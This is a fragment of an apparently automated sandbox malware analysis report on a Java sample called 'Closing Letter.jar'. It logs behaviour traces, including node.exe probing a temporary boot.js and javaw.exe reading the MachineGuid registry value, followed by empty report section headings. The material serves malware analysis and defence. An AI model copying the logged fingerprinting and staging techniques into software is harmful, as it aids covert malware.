Code function: 2_2_03230380 cpuid

2_2_03230380

Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation	Jump to behavior
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Closing Letter.jar

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Sigma Overview

Signature Overview

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information: